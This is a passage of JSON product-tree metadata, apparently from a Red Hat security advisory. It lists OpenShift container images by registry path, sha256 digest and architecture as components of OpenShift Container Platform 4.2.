"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
